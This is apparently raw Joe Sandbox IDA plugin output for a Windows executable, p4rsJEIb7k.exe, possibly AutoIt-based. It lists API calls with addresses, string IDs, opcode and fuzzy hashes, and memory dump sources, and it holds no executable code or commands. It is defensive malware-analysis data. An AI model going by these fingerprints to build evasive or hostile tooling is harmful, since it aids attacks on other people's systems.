                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3363329723-1585850449
                                                                                                                • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104), ref: 004222D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName
                                                                                                                • String ID: C:\Users\user\Desktop\p4rsJEIb7k.exe$lI
                                                                                                                • API String ID: 514040917-665794331
                                                                                                                • Opcode ID: 6471261ceed6c4e84fcd86acbbd5ec6f229b0cd72896a57254f0e496610a85db
                                                                                                                • Instruction ID: 949a5422ac16129abcdf6a7e13ae2ad22a8803a3c22bcf3cdebf143c23a23c82
                                                                                                                • Opcode Fuzzy Hash: 6471261ceed6c4e84fcd86acbbd5ec6f229b0cd72896a57254f0e496610a85db
                                                                                                                • Instruction Fuzzy Hash: CD11B172700229BB8B14CBA4FE808EE77A8EB49360765053FF511D3290EA78DE018768
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InternetOpen
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                • wsprintfW.USER32 ref: 004560E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendwsprintf
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3751067900-328681919
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                APIs
                                                                                                                • HeapReAlloc.KERNEL32(00000000,-00000010,00000000,00000000,0041A813,00000000,?,00000000,00413979,?,?,00411739,?,00401C0B), ref: 0041A2DA
                                                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0041A813,00000000,?,00000000,00413979,?,?,00411739,?,00401C0B), ref: 0041A310
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00411739,?,00401C0B), ref: 0041A32A
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00411739,?,00401C0B), ref: 0041A341
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3499195154-0
                                                                                                                • Opcode ID: bc501b1f3452fb4555c1e7e86ad22a71cea65b8e1d754c6294030291da32ca1b
                                                                                                                • Instruction ID: c0789fce48f3efc00023f82bc826da5228bc21048a08359dcc1a9c3791e9814b
                                                                                                                • Opcode Fuzzy Hash: bc501b1f3452fb4555c1e7e86ad22a71cea65b8e1d754c6294030291da32ca1b
                                                                                                                • Instruction Fuzzy Hash: AD119131604200AFC7214F28ED059567BB5F7597207214A7AF9A6D72F1D3759C828B58